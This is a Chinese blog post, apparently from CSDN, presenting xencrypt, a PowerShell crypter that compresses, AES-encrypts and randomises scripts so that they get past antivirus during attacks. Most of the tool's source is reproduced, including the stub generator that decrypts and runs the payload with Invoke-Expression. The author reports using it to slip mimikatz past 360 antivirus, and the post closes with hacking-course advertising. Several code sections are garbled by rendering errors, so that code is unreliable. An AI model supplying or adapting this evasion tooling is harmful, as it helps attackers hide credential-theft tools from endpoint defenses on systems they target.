我们在攻击过程中,经常会遇到有杀软拦截的情况,对于绕过的方式也不尽相同:有基于黑白名单的,有基于shellloader的,也有基于加密与混淆的。今天介绍一款工具-xencrypt是基于powershell编写的,原理是基于加密与混淆的工具,大家知道现在加密和混淆被杀软检测的狠,其实生存空间越来越难,这个工具主要觉得原来就用过,觉得效果还行,同时工具整体不复杂,可以基于需求自己修改来用。
网络安全学习教程及工具包 点击免费领取
工具的整体流程为
源码也是简洁明了,算上注释才200行,不算注释在150行左右:
1.读取文件
# read
Write-Output “[*] Reading ‘
(
(
(infile)’ …”
c
o
d
e
b
y
t
e
s
=
[
S
y
s
t
e
m
.
I
O
.
F
i
l
e
]
:
:
R
e
a
d
A
l
l
B
y
t
e
s
(
codebytes = [System.IO.File]::ReadAllBytes(
codebytes=[System.IO.File]::ReadAllBytes(infile)
for ($i = 1; $i -le $iterations; $i++) {
# Decide on encryption params ahead of time
Write-Output "[*] Starting code layer ..."
$paddingmodes = 'PKCS7','ISO10126','ANSIX923','Zeros'
$paddingmode = $paddingmodes | Get-Random
$ciphermodes = 'ECB','CBC'
$ciphermode = $ciphermodes | Get-Random
$keysizes = 128,192,256
$keysize = $keysizes | Get-Random
$compressiontypes = 'Gzip','Deflate'
$compressiontype = $compressiontypes | Get-Random
# compress
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()
2.压缩
Write-Output "[*] Compressing ..."
[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
if ($compressiontype -eq "Gzip") {
$compressionStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
} elseif ( $compressiontype -eq "Deflate") {
$compressionStream = New-Object System.IO.Compression.DeflateStream $output, ([IO.Compression.CompressionMode]::Compress)
}
$compressionStream.Write( $codebytes, 0, $codebytes.Length )
$compressionStream.Close()
$output.Close()
$compressedBytes = $output.ToArray()
3.生成秘钥
# generate key
Write-Output “[*] Generating encryption key …”
a
e
s
M
a
n
a
g
e
d
=
N
e
w
−
O
b
j
e
c
t
"
S
y
s
t
e
m
.
S
e
c
u
r
i
t
y
.
C
r
y
p
t
o
g
r
a
p
h
y
.
A
e
s
M
a
n
a
g
e
d
"
i
f
(
aesManaged = New-Object "System.Security.Cryptography.AesManaged" if (
aesManaged=New−Object"System.Security.Cryptography.AesManaged"if(ciphermode -eq ‘CBC’) {
KaTeX parse error: Expected 'EOF', got '}' at position 78: …BC }̲ elseif (ciphermode -eq ‘ECB’) {
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::ECB
}
if ($paddingmode -eq 'PKCS7') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
} elseif ($paddingmode -eq 'ISO10126') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ISO10126
} elseif ($paddingmode -eq 'ANSIX923') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::ANSIX923
} elseif ($paddingmode -eq 'Zeros') {
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
}
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
$aesManaged.GenerateKey()
$b64key = [System.Convert]::ToBase64String($aesManaged.Key)
4.加密
Write-Output "[*] Encrypting ..."
$encryptor = $aesManaged.CreateEncryptor()
$encryptedData = $encryptor.TransformFinalBlock($compressedBytes, 0, $compressedBytes.Length);
[byte[]] $fullData = $aesManaged.IV + $encryptedData
$aesManaged.Dispose()
$b64encrypted = [System.Convert]::ToBase64String($fullData)
5.写操作
Write-Output "[*] Finalizing code layer ..."
# now, randomize the order of any statements that we can to further increase variation
$stub_template = ''
$code_alternatives = @()
$code_alternatives += '${2} = [System.Convert]::FromBase64String("{0}")' + "`r`n"
$code_alternatives += '${3} = [System.Convert]::FromBase64String("{1}")' + "`r`n"
$code_alternatives += '${4} = New-Object "System.Security.Cryptography.AesManaged"' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$code_alternatives = @()
$code_alternatives += '${4}.Mode = [System.Security.Cryptography.CipherMode]::'+$ciphermode + "`r`n"
$code_alternatives += '${4}.Padding = [System.Security.Cryptography.PaddingMode]::'+$paddingmode + "`r`n"
$code_alternatives += '${4}.BlockSize = 128' + "`r`n"
$code_alternatives += '${4}.KeySize = '+$keysize + "`n" + '${4}.Key = ${3}' + "`r`n"
$code_alternatives += '${4}.IV = ${2}[0..15]' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$code_alternatives = @()
$code_alternatives += '${6} = New-Object System.IO.MemoryStream(,${4}.CreateDecryptor().TransformFinalBlock(${2},16,${2}.Length-16))' + "`r`n"
$code_alternatives += '${7} = New-Object System.IO.MemoryStream' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
if ($compressiontype -eq "Gzip") {
$stub_template += '${5} = New-Object System.IO.Compression.GzipStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
} elseif ( $compressiontype -eq "Deflate") {
$stub_template += '${5} = New-Object System.IO.Compression.DeflateStream ${6}, ([IO.Compression.CompressionMode]::Decompress)' + "`r`n"
}
$stub_template += '${5}.CopyTo(${7})' + "`r`n"
$code_alternatives = @()
$code_alternatives += '${5}.Close()' + "`r`n"
$code_alternatives += '${4}.Dispose()' + "`r`n"
$code_alternatives += '${6}.Close()' + "`r`n"
$code_alternatives += '${8} = [System.Text.Encoding]::UTF8.GetString(${7}.ToArray())' + "`r`n"
$code_alternatives_shuffled = $code_alternatives | Sort-Object {Get-Random}
$stub_template += $code_alternatives_shuffled -join ''
$stub_template += ('Invoke-Expression','IEX' | Get-Random)+'(${8})' + "`r`n"
# it's ugly, but it beats concatenating each value manually.
$code = $stub_template -f $b64encrypted, $b64key, (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var), (Create-Var)
$codebytes = [System.Text.Encoding]::UTF8.GetBytes($code)
}
Write-Output "[*] Writing '$($outfile)' ..."
[System.IO.File]::WriteAllText($outfile,$code)
Write-Output "[+] Done!"
整个流程非常的简洁明了,不满足现有需求的,也可以自己修改源码。
使用minikataz测试一下效果,未经工具处理的检测结果
使用默认参数的效果
经过5次工具处理的结果
觉得效果还可以,毕竟国内常用的360这些还是过了的。项目地址:https://github.com/the-xentropy/xencrypt 有更高需要的,可以自己再改改源码
朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往免费获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》
这份完整版的学习资料已经上传CSDN,也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费
】